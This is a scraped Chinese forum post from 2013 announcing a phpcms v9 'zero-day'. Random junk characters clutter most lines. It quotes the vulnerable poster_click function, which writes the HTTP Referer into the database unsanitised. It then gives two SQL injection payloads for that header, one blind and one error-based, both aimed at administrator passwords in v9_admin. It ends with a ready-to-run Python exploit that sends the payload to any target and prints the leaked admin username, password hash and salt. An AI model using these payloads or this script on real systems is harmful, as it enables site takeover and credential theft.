有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
8 h. o4 Z' F) Y: [3 R
- t* ~& _0 g( s" c8 O# e% v3 E" l问题函数\phpcms\modules\poster\index.php
1 I! ]( U3 [2 {9 z2 x% m% h% K, n: D* }
public function poster_click() {2 y8 W: i" m* }, J/ l4 }- _/ B
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;2 ?1 M% Z! z J4 r4 X$ |
$r = $this->db->get_one(array('id'=>$id));' v4 p' ^! U. R4 l0 \% b! ^0 x G# [( z
if (!is_array($r) && empty($r)) return false;
( a2 l$ |) @" I( F/ x& _$ip_area = pc_base::load_sys_class('ip_area');8 y) Z% g) y% S
$ip = ip();
' B4 |" c2 f5 ^3 U& k$area = $ip_area->get($ip);
! R* u, H$ A% F( |) ?$username = param::get_cookie('username') ? param::get_cookie('username') : '';
5 W: S9 ~. ^- V; U, l+ I$ S$ Sif($id) {
& p9 U; \! j9 ~# a( v, j% g' p$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();+ S5 v! ~8 P( G: L3 k9 C2 v: V
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
9 J3 |8 `$ r; j6 u* U3 @2 Y}
# ]9 E) v6 P( q$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));5 d- B. \1 |. t, p
$setting = string2array($r['setting']);
/ T& a* f( r$ m# p, cif (count($setting)==1) {' L5 R! x; ]- {2 p* {4 \1 Z$ d
$url = $setting['1']['linkurl'];" l8 V5 a/ Q$ i; @, {
} else {
5 F# t6 O. Z3 b" ?" l* N+ L# x$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
" D, @. O! ?5 b# E* s& V8 L. S}
2 a) x, I- c g' g8 g8 aheader('Location: '.$url);* ?6 z# h7 x* l c& t
}
- |0 a! n9 J- {; l& ^- ?! o+ q( B
8 l! y, Q3 G5 ?. z5 r5 ^! D2 d, D8 D " H7 a) ]/ x C; s- `
% f L- h% ^" K k
利用方式: i' g8 W H/ F; i3 v9 M& F& ~
8 ]; D0 S1 s9 C! a1、可以采用盲注入的手法:
! `- {- \$ y, [6 O
" W0 u- Y, Z1 t T4 Areferer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#( O$ B' A$ k& }5 J( U+ [
) y# a2 A* F7 p8 R
通过返回页面,正常与否一个个猜解密码字段。; d) S( J* B1 r/ k' F6 D( y( [4 N
4 F" s6 f( r) l" K. n
2、代码是花开写的,随手附上了:3 Q) i H5 _2 u" n' J \7 [* Y5 D. C
$ w& C' G( S( s: a6 E7 K# j1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#- T1 V0 F$ _ X0 X) O y
3 K M. G) w3 F1 q+ c3 _此方法是爆错注入手法,原理自查。+ B9 [5 d% Q& S
. y+ u8 F5 `# u5 K9 Y
) I# I k& M4 J6 w0 u' v/ j9 r: B; G) g; I9 O5 P& N- Z3 Q
利用程序:6 b. {+ l: |' M& s0 c) a
0 Y5 \( [/ e7 H#!/usr/bin/env python3 c0 N* w1 ]) e' H
import httplib,sys,re* X1 ]4 h3 B3 R. n2 p9 ~. _
' c4 J2 r: Z/ k5 q; b
def attack():
/ l2 o4 o( U. _/ v1 Uprint “Code by Pax.Mac Team conqu3r!”1 {4 h: i7 W2 U3 I V2 x3 c
print “Welcome to our zone!!!”6 W( \/ {% q0 m' R# f$ O, ^
url=sys.argv[1]
! X9 z4 i8 D& ?. p' L4 q* a, opaths=sys.argv[2]8 p0 L# z9 x1 O! ]3 }& P! s: B
conn = httplib.HTTPConnection(url)* q% q$ W3 T) w
i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
( k& x& ?0 e d“Accept”: “text/plain”,- b' I+ `# M3 ^& F& ]2 S
“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}* j$ V* |# T& n- l' R4 ]. a- E
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
4 c" P1 ]. |5 p1 |* D/ br1 = conn.getresponse()) h; g5 ?! ?% Z' \( @
datas=r1.read()
* I M; _# d/ k! c8 U6 @3 G1 Qdatas=re.findall(r”Duplicate entry \’\w+’”, datas)
( x6 E* Y" X6 x5 Q! d4 bprint datas[0]
5 X3 v8 F0 r5 J# D9 G Pconn.close()/ F, T/ M: @* v8 s0 v
if __name__==”__main__”:
: K* d2 }, V: R, xif len(sys.argv)<3:! ]4 R8 v e) C$ d% p+ E9 p7 d
print “Code by Pax.Mac Team conqu3r”
t3 l: Y$ L |0 g+ |+ }3 j/ g, L5 n0 yprint “Usgae:”
; D) x+ s8 J) N/ `print “ phpcmsattack.py www.paxmac.org /”
! B" g* t$ x# P; I4 L3 F! U7 Gprint “ phpcmsataack.py www.paxmac.org /phpcmsv9/”0 J/ f0 w6 {( Z( ?8 G8 v9 D) j
sys.exit(1)5 y8 n/ j* k& d% r. W, [0 J
attack()3 C1 Z0 G( ^. |' F) i- P9 G
4 k' [' F* Y: y6 F Y
|
发表于 2013-1-11 21:01:00
收藏
支持
反对